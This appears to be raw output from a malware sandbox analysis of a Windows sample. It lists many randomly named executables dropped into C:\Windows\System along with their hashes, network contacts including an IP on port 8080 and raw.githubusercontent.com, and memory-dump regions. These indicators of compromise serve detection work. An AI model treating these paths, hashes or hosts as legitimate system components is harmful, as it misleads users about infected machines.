C:\Windows\System\CrnGNIQ.exe

C:\Windows\System\KzfUBqV.exe

C:\Windows\System\KzfUBqV.exe

C:\Windows\System\TBTQcfl.exe

C:\Windows\System\TBTQcfl.exe

C:\Windows\System\mdTmStj.exe

C:\Windows\System\mdTmStj.exe

C:\Windows\System\CWxBTeQ.exe

C:\Windows\System\CWxBTeQ.exe

C:\Windows\System\FigqgBz.exe

C:\Windows\System\FigqgBz.exe

C:\Windows\System\XVayWpL.exe

C:\Windows\System\XVayWpL.exe

C:\Windows\System\OUtDLla.exe

C:\Windows\System\OUtDLla.exe

C:\Windows\System\mxzTuVF.exe

C:\Windows\System\mxzTuVF.exe

C:\Windows\System\BpdjyPR.exe

C:\Windows\System\BpdjyPR.exe

C:\Windows\System\oIolvAW.exe

C:\Windows\System\oIolvAW.exe

C:\Windows\System\BPnHaiZ.exe

C:\Windows\System\BPnHaiZ.exe

C:\Windows\System\rwWfwRG.exe

C:\Windows\System\rwWfwRG.exe

C:\Windows\System\VVKiyJG.exe

C:\Windows\System\VVKiyJG.exe

C:\Windows\System\llsVlKy.exe

C:\Windows\System\llsVlKy.exe

C:\Windows\System\gBMaeTU.exe

C:\Windows\System\gBMaeTU.exe

C:\Windows\System\uBcLxPD.exe

C:\Windows\System\uBcLxPD.exe

C:\Windows\System\fvkVvmL.exe

C:\Windows\System\fvkVvmL.exe

C:\Windows\System\SwEqqFi.exe

C:\Windows\System\SwEqqFi.exe

C:\Windows\System\wyHYtQB.exe

C:\Windows\System\wyHYtQB.exe

C:\Windows\System\ZULEyZq.exe

C:\Windows\System\ZULEyZq.exe

C:\Windows\System\ezHRGVt.exe

C:\Windows\System\ezHRGVt.exe

C:\Windows\System\hZdNbaS.exe

C:\Windows\System\hZdNbaS.exe

C:\Windows\System\fjiNNEF.exe

C:\Windows\System\fjiNNEF.exe

C:\Windows\System\AnslZyX.exe

C:\Windows\System\AnslZyX.exe

C:\Windows\System\xIQixUL.exe

C:\Windows\System\xIQixUL.exe

C:\Windows\System\FXiMDrT.exe

C:\Windows\System\FXiMDrT.exe

C:\Windows\System\dLMpoph.exe

C:\Windows\System\dLMpoph.exe

C:\Windows\System\lWSZCUE.exe

C:\Windows\System\lWSZCUE.exe

C:\Windows\System\GcglHBq.exe

C:\Windows\System\GcglHBq.exe

C:\Windows\System\yNjcXQA.exe

C:\Windows\System\yNjcXQA.exe

C:\Windows\System\riYPOPM.exe

C:\Windows\System\riYPOPM.exe

C:\Windows\System\fEltpJa.exe

C:\Windows\System\fEltpJa.exe

C:\Windows\System\YlzOICq.exe

C:\Windows\System\YlzOICq.exe

C:\Windows\System\lgAbPHh.exe

C:\Windows\System\lgAbPHh.exe

C:\Windows\System\AAfvdaL.exe

C:\Windows\System\AAfvdaL.exe

C:\Windows\System\llBWZDQ.exe

C:\Windows\System\llBWZDQ.exe

C:\Windows\System\gCOuQZn.exe

C:\Windows\System\gCOuQZn.exe

C:\Windows\System\WYNyRsR.exe

C:\Windows\System\WYNyRsR.exe

C:\Windows\System\dNNWNbm.exe

C:\Windows\System\dNNWNbm.exe

C:\Windows\System\QnBDGXw.exe

C:\Windows\System\QnBDGXw.exe

C:\Windows\System\zhGWmJQ.exe

C:\Windows\System\zhGWmJQ.exe

C:\Windows\System\JoxSrLF.exe

C:\Windows\System\JoxSrLF.exe

C:\Windows\System\mJCQNjt.exe

C:\Windows\System\mJCQNjt.exe

C:\Windows\System\uQmEfDC.exe

C:\Windows\System\uQmEfDC.exe

C:\Windows\System\cpboGHt.exe

C:\Windows\System\cpboGHt.exe

C:\Windows\System\RRRLxQY.exe

C:\Windows\System\RRRLxQY.exe

C:\Windows\System\PfDfjWt.exe

C:\Windows\System\PfDfjWt.exe

C:\Windows\System\yzXfUNt.exe

C:\Windows\System\yzXfUNt.exe

C:\Windows\System\VCoeInH.exe

C:\Windows\System\VCoeInH.exe

C:\Windows\System\zGRwjEZ.exe

C:\Windows\System\zGRwjEZ.exe

C:\Windows\System\VjmKLIK.exe

C:\Windows\System\VjmKLIK.exe

C:\Windows\System\gepLzLC.exe

C:\Windows\System\gepLzLC.exe

C:\Windows\System\PVmfODI.exe

C:\Windows\System\PVmfODI.exe

C:\Windows\System\XvzJWSt.exe

C:\Windows\System\XvzJWSt.exe

C:\Windows\System\McLrDoj.exe

C:\Windows\System\McLrDoj.exe

C:\Windows\System\OSrwXIJ.exe

C:\Windows\System\OSrwXIJ.exe

C:\Windows\System\tFmysmj.exe

C:\Windows\System\tFmysmj.exe

C:\Windows\System\TrczMlZ.exe

C:\Windows\System\TrczMlZ.exe

C:\Windows\System\ivipGTO.exe

C:\Windows\System\ivipGTO.exe

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2852" "2972" "1936" "2976" "0" "0" "2980" "0" "0" "0" "0" "0"

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/4284-0-0x00007FF6DAC20000-0x00007FF6DB012000-memory.dmp

memory/4284-1-0x0000020422EE0000-0x0000020422EF0000-memory.dmp

C:\Windows\System\nOsvlVs.exe

MD5 b52ada386d923f37fa7068c70b9367df
SHA1 691c183813a31cbce36d84211904e7881bfbd2e8
SHA256 31c2b3189e8186d2a7f2884b2d9852b10339bae48eca3cff11f13211045d06d7
SHA512 8f4473e24f4af651288ccd28370543b0899f86a03fc3cfb0ba72b3c27fe979e309a6068a109cc976d4344a01067978db09a47b6279b25d88d3988385cacfee1a

memory/2852-9-0x000001EBE7230000-0x000001EBE7240000-memory.dmp

memory/2852-10-0x00007FFC70883000-0x00007FFC70885000-memory.dmp

C:\Windows\System\vNBRRlO.exe

MD5 842fbf420f6c7b8bc099faa32e09f76b
SHA1 197b937102be7a5e3d4d217e377fb6c7314a3fd7
SHA256 de40bf6f132f5f157a1abe38af8f3d801ac5158cc068dda1841e1b1e72306d86
SHA512 42b43b1a058acea90f50c3fe6b7f1fbbcc32463a8cd9f55b6487ba1774bf0b509edab21763de6967092db425c0f464f8b71fa5ce0a5be562ce621a9f632f53d2

C:\Windows\System\bxZMfjj.exe

MD5 c2c3d4c7a04e2c0e2b72c5b90b9789b1
SHA1 cabc073ef12a8c600750b2a3a4d91bc1b17f91c4
SHA256 771b3505a265a9b67838e1fcec0278c3a6bdb05d84d09a24e67468db5398804a
SHA512 9b8edb5537b3ce3f73d97cc9567531ed8e8b8fccdb15d15c76779f269ce26239732d5b498cf111c9786cb123c76abf8705ea8e40d0b5b242005479b10d5bddbe

C:\Windows\System\Yalmwld.exe

MD5 4226a693e10d87649ee9fd7addf67e13
SHA1 cca660db8fedf00f01ddb8c7b703c17537208171
SHA256 b5ed4d0a407fdc57b8877840ff30d7e1f67e71528c0ebf04c17cb6c734cd2890
SHA512 a1b28155bf83e76e17f81bafea55a41e1d8cd6a5860430c8d536b333274e32e5338111f3df781c079a95bae37aaf9abdad7510083170e1ce14a7553d7f738032

C:\Windows\System\zSrTtJg.exe

MD5 efaab0b2b4f3f23e84acdbdd16a6381e
SHA1 2d7fa836222996d7eba46e03e1915cb6a224ed56
SHA256 d08c118d21fc497e1dde5a17482417773d6c233466159dfc849549fb65d7a84a
SHA512 6d4ca205abca3e18abd8ad6be6c106aaeb2b795cf8f564caf31b656ba166ec13f4fdcd77db5d1e0cb21bff6ec03ed4613ef7afcd98eff8b98cae5ee8f8ce5f31

C:\Windows\System\ntJieYF.exe

MD5 0bde5e30b080981c7e2da1121e35fed3
SHA1 c55627b8ac66194af1f765f7b7c01cdab90d8ffb
SHA256 61d62acee3efc7775ebcd56e83a095074e9347a836d81e051d737b294b5de1eb
SHA512 a5234eb6014f63a1b6f649428bce84455f6cf37df3ba81f7d1c0e6cb2417ffac3701c46b7c8a950f08639d9aba7da91afd1e3f2b059d788be459037f3207f9fd

C:\Windows\System\SHVfHig.exe

MD5 b9f9319d8aef1b61e2f4508af29e1f23
SHA1 6b27f165e632c0a528fd9d933af5954913bebb06
SHA256 3c6b5be46384aa1af39af5d75dda628055a1725993ef44472c1b7031bc573bdd
SHA512 d72e7751681e0478cd0bdd0eeb7b439b6576d5cf5ccade933183bdaaf6d66e7fc2fa564ede122f79424da0b44dfe20b0f8640e0883469c908af3270b65ad3183

C:\Windows\System\JYLBnFO.exe

MD5 cb5bb3a860b419973b9d85b3bdd27485
SHA1 eb7bf41e885efefd3fb7e6c6914095ad66635b63
SHA256 bee5bd5130f17836358f9f9d6f434be0ca517e56de5a2a6cb6585e2ebe424cfd
SHA512 68a59c7e28e863c5896c81cf027d5db9c651ca10d493ec42d429c45048f270439b834d3824c9634d56d38a34118adc78a95dd7bdca3bcdbe7e24eae1675ef095

C:\Windows\System\zJnHgwu.exe

MD5 786acb395c13305cbd07097f559c78c0
SHA1 615a5db353214cedd06f6ecdbb774c1907a965b4
SHA256 34daec5fe8570ff112f46d946dc4c327a7d6a666e13471180af2316cceec072b
SHA512 e25abd8d83b7a4604fe57cd1b6cb6b59ef366b8c285da64a59637930b732a60e0ce66efc39ad3ac57f5e5e54bbd8144b03d4fe0ec20ceaec29818f836b3353cb

C:\Windows\System\kVCpWCY.exe

MD5 ec54d68326f53e6c9fd4fb6eb37fee5a
SHA1 c74225bf81e74e910f2f764f9717b602fb50b5e7
SHA256 38e84a3ef284bb946e4fb702a1b2364369ae809defaef601b064100e4ddedb5e
SHA512 a033ebd3f1d94dfca7c54c7d3c6bc87c82d8fea720995d704fbbf9eeda2235463cd37896da47317c1df244cf1061d577043b51d8bc4e8d76ef4f3017e8bdcb42

memory/2120-99-0x00007FF671110000-0x00007FF671502000-memory.dmp

C:\Windows\System\ChkBlmA.exe

MD5 9e4a46848bbd2484a6c23a271d7ae9f7
SHA1 35c2a5ab2d073b5bdae6614a9d0ca1505c8ea49b
SHA256 07310f404efbdf3195640553a98ba376891655b4844acd688bb502bcdcfd176a
SHA512 3af843a0d4890d0ae46697c2f59f97411269967bc84132e6f6e568fc67859b1041ff5db2b768de87a5909ccdd8d09cbc739db10bb74403a9cb5950941dc82bf9

C:\Windows\System\mfdUQZU.exe

MD5 5a31a5e152528ae847b1d47580661579
SHA1 eec16c10457870b4136bcf9fbb2d00b5cfdf4650
SHA256 0b7b667473cb0b0f5d914e76204e303bcc225570a2258665c13821608a94cd05
SHA512 66939a2a909e487e81ee0f6447b463df5e49277ea32f239359279e2f8e171f0cd669e49c09e329b31312f6f07ca7147023df2af709a8b1f11efad20becb31950

C:\Windows\System\CZYxexW.exe

MD5 d0296df78f343a2ff2db6dc4ceccfe42
SHA1 c14232c6bc786f1166179f8ad46c337caf2b1797
SHA256 a0e6d055796fc8c06b5311f1787903a4993fa1b371ae1be2a2d17763b13d5a77
SHA512 2fd9a6fd452b9da06f31e0efad9224cb89590aae32faed16c70db7fae85f861c83d8ee9c25be91f7dea135c72b341659f19df7334905d2866e4a9ee145a8d350

memory/5108-124-0x00007FF7F8E10000-0x00007FF7F9202000-memory.dmp

memory/4992-133-0x00007FF77A600000-0x00007FF77A9F2000-memory.dmp

C:\Windows\System\oOSYaGq.exe

MD5 e3d77fae30c8065e854cd6725bbdfa59
SHA1 b5ce785fb43f20c11de843950bca3ebd894ca685
SHA256 2ac0c63981537fc1d2c0247f2e7e3c4086d3fc05725ad916d72d4fe42bf1a150
SHA512 187c299f6f58c52e7207d72ba8bffed8be232571e431fdcf1956289a7ab6caaa9509507e1824cf39fad271f684bf9f2ce943ba79795eb1e054ef2e5777ed1f83

C:\Windows\System\YlgZnbZ.exe

MD5 d288a3da89438d8e21f0c83586572413
SHA1 289eb54592bc3a1311ade0cdea2955c24e2ff84e
SHA256 4c0e3d6966fa66cdb3fb103d844d23ebcdb09b959c832a0d93fc6ad873d70533
SHA512 ad0a5db3e51defe56666244eec6a1c74be8a7ee58c19986c3c324a2313bdaed2bafff3bab5d2c77918632174c3abd6dd840d4339679c4a7efaa99f76ba5b48e7

memory/1044-166-0x00007FF6CA900000-0x00007FF6CACF2000-memory.dmp

C:\Windows\System\rygAwMO.exe

MD5 988e9564b62fafc5ba7fcc29f67d1b8b
SHA1 ce061b673429665895629aca0603888ccea95c31
SHA256 ada62402a28daf44c6b075099bedad8bf73ab1f7e43635d2bf9883d0a15e98c5
SHA512 928014ac37a174a2cc53a6fc063ed0b9ee4cacd8e94fe6f8d04024d4eda2859a767acdaa5818e8a1f8fc371416401d3de7021e6fedd6cafe7e2431b9f7f3e12b

C:\Windows\System\hJsiyRl.exe

MD5 1291c0c6cfa9c72b0422d83e327be7ce
SHA1 9b2dee005e7887c3e5df62dce12f7babec0f50e9
SHA256 c05812865fc11de6997b94ed24a857b47d04b5dd48e7069f708e5c249c168aa5
SHA512 bc3b3af8832ae3ddfa3c74bfc08c11d7556ab58bafdf8d146757421de1b5ed3223c248e52ebe0ce42a11ecf8251345a43c2291dadeb2d8bb6118aaf4f60b37ce

C:\Windows\System\QbbSmaB.exe

MD5 2dcff32ddf3df9b9591ec62b6a31b236
SHA1 6f814ed290e8e8504cd4a9588206e2fddde14fbf
SHA256 2fcb0982b2b92ace5a908033e008f913d96f07c2a24019a3169cf38785455142
SHA512 ed59f00c4f01475b60f5d6311c49b6d78ef35e760d0a87a4e5a13fcb7cca89854ac9bc9eb2e679b40e655578cfcc6756126d07a57207081a84f0bc8f285dc635

C:\Windows\System\ANOQTHx.exe

MD5 96031727912dafaa89bd483cdfed6875
SHA1 55ff83d3e93acf904aaa2e62b6ea3cba7eb35df6
SHA256 88e18e177e64cce708e78bae0d3a80e2b9b9076844e48ddca47c184c4061e31f
SHA512 e3b61b8ccf4c5e1ddec69de61c76355a88a8b92b4b057de83338fc567e7d9d5ab13d3f0e04b4d54a34672c25f5fe704097bd73fed53f32ce257bb393b06c256a

C:\Windows\System\WJBitpO.exe

MD5 3f3445ec4b51060bd4023f704712026b
SHA1 ad8c15ea40f6cf0705cc806acdcf0d0bcffdc1c5
SHA256 eb7364eab0d85638497b487c3f3582d2f1ab344ac25acb4da88b9e7246c424a4
SHA512 b2deb9c71acdeedd2e9ec946f3b0f4fa80975497da8e1754ddb594c0fcf9af3a5a3f5233568e6def881e46aabeca5b7166a7a6c360ed2dd37cb3d6e580664ed4

C:\Windows\System\JJvJMQL.exe

MD5 956a31c15f8c1b8668b692c7752bbda4
SHA1 54185944d7e7edb66a7b92b03a84501a932fc674
SHA256 8c249c047449620561ebd17093e5e56516fcc7838440791e7fc4aca8b4dbf5a2
SHA512 87b1147d646c7e48bb3411a7dc00e222c9b7ab3a83d0498e16db34634e84f46a2a553a560441fd1d171790b927bce1de831fd02339229c5d55d03a355ae8fd36

C:\Windows\System\wlydLxw.exe

MD5 9ad8741c4789b60b07ca45fb7ac7018c
SHA1 1b06aec35567003c1d3e31a68c358b5d6658f758
SHA256 7d677d54c15687a24957fca1a181fa36040d768056be04cb9df26b076e129e31
SHA512 574ac74d919cd849a6e1986bca07a95669f2f9bcefbc060a7ba65de5542d4d0fa458283658e8def86e8ea8a8972a46762ef4586c987795a6707038adf8667134

C:\Windows\System\tMNoHOf.exe

MD5 415aff5b799f097ffcaa3e313fdad874
SHA1 9503c0cfdc42e74d7a1e9240ad07ce5559ccb205
SHA256 c10f50a39249f4af2c7c8e4b7cebe9abf9feb7ba2d46d94ed8d807548880d91b
SHA512 8da412937d7f3703f0a0a1597b9293c187abe30217f532730560d50bc1674ae1fee436420a0cb39ec2c685c33f6589bfb4960533f8a6ff966f1dca74f1e00754

memory/3052-172-0x00007FF699400000-0x00007FF6997F2000-memory.dmp

C:\Windows\System\fXgqxZo.exe

MD5 8944868ac76b94c4d6139993a4f60992
SHA1 7ae90c0fcb213a7f2766276c3c48828d9114a2fb
SHA256 3ad270468ddde21af470da3846100652c03e5d48f57e268c9d3e8f0157a62b81
SHA512 76cacfd5d0d5585cbf1c91c66de4725c9d2336b3b43902248274a7b9f90778441f1678846f5fbd00c2d573e53eb6b252d564b90ea4d5854ec1bb2a6ed5b8be97

memory/2528-160-0x00007FF644340000-0x00007FF644732000-memory.dmp

C:\Windows\System\oSkTxCx.exe

MD5 c99cd0ddf0e3370f7ad598002679415c
SHA1 091ebc36ce1d890b33858a6d730f2a2ba2420820
SHA256 bcf8c0ba87b7dd30c069c6c364fd7716830a5b585aab094458cdf67ccdfe1764
SHA512 43eeb513ae467d4ff6afc44a9851280dd64397478789b496d491bc8accfadc6f2955c896e2309d3f86a8ed9d536f89ea5eb0893e4a83d27566c81ee837b19646

memory/2572-154-0x00007FF6C7610000-0x00007FF6C7A02000-memory.dmp

memory/3388-153-0x00007FF693920000-0x00007FF693D12000-memory.dmp

memory/2852-334-0x000001EBE8190000-0x000001EBE8936000-memory.dmp

memory/3444-147-0x00007FF726CB0000-0x00007FF7270A2000-memory.dmp

memory/540-143-0x00007FF738F00000-0x00007FF7392F2000-memory.dmp

C:\Windows\System\NpdbiHN.exe

MD5 e9d09566b166039703c858579d9562cd
SHA1 88e9920c1c56c3963c01b48c50aa9ed369fbdd7a
SHA256 5620fe4f4cf1a2c894285bea737f00cde405607bd812ff61d053b87f5cd08bae
SHA512 9823cb67031ae1c211df1cd27ef69ad361d7a169ca1606b910a923fc6c68fd4f3e97de0b11402ca35c6fbe38aeaf87fdff2c3bd8a2d95a934940607f02d91118

memory/3496-137-0x00007FF7DD820000-0x00007FF7DDC12000-memory.dmp

memory/4928-134-0x00007FF66CFA0000-0x00007FF66D392000-memory.dmp

C:\Windows\System\VquUxub.exe

MD5 5aeadea0f8d02c90eea9dc47deeb88c4
SHA1 decb5756611bb358a1aa6367f46cf41393ec8e70
SHA256 de77862a81653d6de7f83c35e6a5f1efd79cc6f3d4a45783b4018cf82a895de9
SHA512 fcf834b8aabc47cd5a87ae51ce05a591fd8cfaa5abe1ad15c2679ead06c27788fd02ea73f3ad7cd9c81524efa12359b394f54947d9ea62a3cb39b2d1386d041d

memory/3668-129-0x00007FF6D0780000-0x00007FF6D0B72000-memory.dmp

memory/4776-128-0x00007FF765B00000-0x00007FF765EF2000-memory.dmp

memory/4932-119-0x00007FF722AC0000-0x00007FF722EB2000-memory.dmp

memory/4480-115-0x00007FF638100000-0x00007FF6384F2000-memory.dmp

memory/4192-114-0x00007FF7DF5E0000-0x00007FF7DF9D2000-memory.dmp

C:\Windows\System\mRrzciG.exe

MD5 61913ca1e8ffacd57e67e7feabd5b0c4
SHA1 80d57b80292a88d913184446222500565b30a7bd
SHA256 6a25d45c12448ea01bcd3a2f0245ab6525698dde958fa8a873aab0f5cfcb04c2
SHA512 52fe76ba33fe4c5d8ebba74db9bc092ca02a96ed4412d725a2230acbb47442adecee7a288cf00b5851dda8e4795c0552bbee579ec6e18fccea0f2ba566cf2261

C:\Windows\System\oAdYkgz.exe

MD5 ebe7dd525b038bd967ffbd338d3c0ae4
SHA1 e01c7db70433d5fea88c91b4a491fa3e259a99ab
SHA256 c82c0bab61826bd550f1636bba6439d003dacae83ccbf15e2661997949625aa8
SHA512 7408daa6671be549cb4ca3a72d5db67a2354e160a090b4a9489fc07125d8b4b5159ba3436cec4da4b36d60b184529f19b4c61588b690f8ec4b7ad34da45b5683

C:\Windows\System\kMwODTH.exe

MD5 4c6ddc0f0bcc010be898df96cf15361a
SHA1 689428618ae833940276fc8c011f7b7dfd4a378b
SHA256 d6a04a146123ff8e30c1afcbd87d5cd11d336971dcc51bde7637f7d4f19ee415
SHA512 0777f595f3e96002bb5cc9ba8d4f56abdc072426f706cb1e9a42865cc6c9a35f384e86146ab7266c357ec4eb2596f536afe8c97aa59844bd60cff3daf08b184e

memory/3716-102-0x00007FF6ABDF0000-0x00007FF6AC1E2000-memory.dmp

memory/1768-88-0x00007FF6632A0000-0x00007FF663692000-memory.dmp

C:\Windows\System\vqcCkIs.exe

MD5 1ac5a865207a5fb9b323ca2c29a07b12
SHA1 96acc815f7d668bd361645b23b2f4c0b68f4c656
SHA256 0cf9643368d4a707725efb16cc75f265ad57c66fee78ced307e6165f2eaf1ffa
SHA512 5982144ad68c8db5187c371b41db759dd93a585085b252cfd5706e39cc73898e588a1361ab9c66708aab155ae67aa72dfa8351ebfb88658b61f596a538e2cba5

memory/2072-75-0x00007FF7D6BA0000-0x00007FF7D6F92000-memory.dmp

memory/4616-74-0x00007FF7D61F0000-0x00007FF7D65E2000-memory.dmp

memory/2616-77-0x00007FF7F4580000-0x00007FF7F4972000-memory.dmp

C:\Windows\System\HaRQnqU.exe

MD5 a1c720395cc9074a9421e7128d9d9f7c
SHA1 6304e050eb368705152a3356547b2ac0ab77200b
SHA256 fd2c8a583d666c3e60e2778705c9e1b46fe4a3e0b92d780fefc96496e7a9a6d5
SHA512 97bb376bf8f788a927cf5b88d5111cab55dc49bca947eb2aa93d58ee2bb67c2f96bbc28c6fe0dad66b3c9ab0edadef1049c61139b76925b08c7bf3fe32851faa

memory/3956-63-0x00007FF65A5A0000-0x00007FF65A992000-memory.dmp

memory/2852-53-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

memory/2852-46-0x000001EBE75B0000-0x000001EBE75D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_afvd1ft3.jex.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\YCwTtxy.exe

MD5 95c5f86588fd62b9df99a5b96cd3739d
SHA1 ee6eb3b593dc0f5a06ecd4a288459c9c64bcfa5e
SHA256 e0ce9ddb97136d3f9363ca69bc0ac1ced1441276fdf017f23f93be3f837087c5
SHA512 47888b028cd42a90285ab8df286663707b2c8582ab268a578346566f463ff3244d8593d7ff6662ef009ee557c060aac4ddcf81e0a0b9fbd457c040540baee313

memory/4160-8-0x00007FF7CF920000-0x00007FF7CFD12000-memory.dmp

memory/4160-1948-0x00007FF7CF920000-0x00007FF7CFD12000-memory.dmp

memory/2852-1949-0x00007FFC70883000-0x00007FFC70885000-memory.dmp

memory/2852-1950-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

memory/4192-1951-0x00007FF7DF5E0000-0x00007FF7DF9D2000-memory.dmp

memory/2852-1991-0x00007FFC70880000-0x00007FFC71341000-memory.dmp

memory/4160-2007-0x00007FF7CF920000-0x00007FF7CFD12000-memory.dmp

memory/5108-2009-0x00007FF7F8E10000-0x00007FF7F9202000-memory.dmp

memory/4776-2011-0x00007FF765B00000-0x00007FF765EF2000-memory.dmp

memory/4616-2013-0x00007FF7D61F0000-0x00007FF7D65E2000-memory.dmp

memory/3956-2015-0x00007FF65A5A0000-0x00007FF65A992000-memory.dmp

memory/2072-2017-0x00007FF7D6BA0000-0x00007FF7D6F92000-memory.dmp

memory/3716-2024-0x00007FF6ABDF0000-0x00007FF6AC1E2000-memory.dmp

memory/2120-2027-0x00007FF671110000-0x00007FF671502000-memory.dmp

memory/4992-2029-0x00007FF77A600000-0x00007FF77A9F2000-memory.dmp

memory/4928-2031-0x00007FF66CFA0000-0x00007FF66D392000-memory.dmp

memory/2616-2026-0x00007FF7F4580000-0x00007FF7F4972000-memory.dmp

memory/3668-2021-0x00007FF6D0780000-0x00007FF6D0B72000-memory.dmp

memory/1768-2020-0x00007FF6632A0000-0x00007FF663692000-memory.dmp

memory/3496-2044-0x00007FF7DD820000-0x00007FF7DDC12000-memory.dmp

memory/3388-2045-0x00007FF693920000-0x00007FF693D12000-memory.dmp

memory/2572-2047-0x00007FF6C7610000-0x00007FF6C7A02000-memory.dmp

memory/4192-2042-0x00007FF7DF5E0000-0x00007FF7DF9D2000-memory.dmp

memory/4932-2038-0x00007FF722AC0000-0x00007FF722EB2000-memory.dmp

memory/540-2036-0x00007FF738F00000-0x00007FF7392F2000-memory.dmp

memory/4480-2040-0x00007FF638100000-0x00007FF6384F2000-memory.dmp

memory/3444-2034-0x00007FF726CB0000-0x00007FF7270A2000-memory.dmp

memory/1044-2062-0x00007FF6CA900000-0x00007FF6CACF2000-memory.dmp

memory/3052-2052-0x00007FF699400000-0x00007FF6997F2000-memory.dmp

memory/2528-2049-0x00007FF644340000-0x00007FF644732000-memory.dmp